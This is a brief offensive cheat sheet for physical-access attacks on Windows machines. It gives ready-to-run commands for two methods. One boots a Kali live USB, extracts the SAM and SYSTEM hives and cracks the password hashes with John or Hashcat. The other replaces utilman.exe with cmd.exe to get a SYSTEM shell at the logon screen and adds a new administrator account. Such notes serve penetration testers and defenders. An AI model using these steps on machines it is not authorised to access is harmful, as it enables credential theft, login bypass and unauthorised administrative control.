Physical Access

Live boot from Kali

# - USB Live Kali
# - Mount the Windows system disk
# - Get SAM and SYSTEM files from "C:\Windows\System32\config\"
# - Extract hashes → samdump2 SYSTEM SAM > hash.txt
# - Crack hashes using JTR (john -format=NT hash.txt) or Hashcat
#    - You may have to use “bkhive" on the SYSTEM file first
#    - John format can also be NT2

Utilman.exe attack

# You can access a SYSTEM cmd shell if you have access to the filesystem
# utilman.exe can be run BEFORE login by "WinKey + U"
# If you can access filesystem and change utilman.exe by a cmd.exe, SYSTEM shell will be run.

# Access can be done by live bootable key (Linux, Windows..)
# From a Windows 10 bootable key -> SHIFT + F10 to access filesystem
move d:\windows\system32\utilman.exe d:\windows\system32\utilman.exe.bak
copy d:\windows\system32\cmd.exe d:\windows\system32\utilman.exe

# OR 

cd windows\system32
ren utilman.exe utilman.exe.bak
copy cmd.exe utilman.exe

# Then on the logon screen --> WinKey + U
# And then
net user NewGuy abc123 /add
net localgroup Administrators NewGuy /add
# Reverting
# To restore utilman.exe, in the Command Prompt type in:
cd windows\system32
del utilman.exe
ren utilman.exe.bak utilman.exe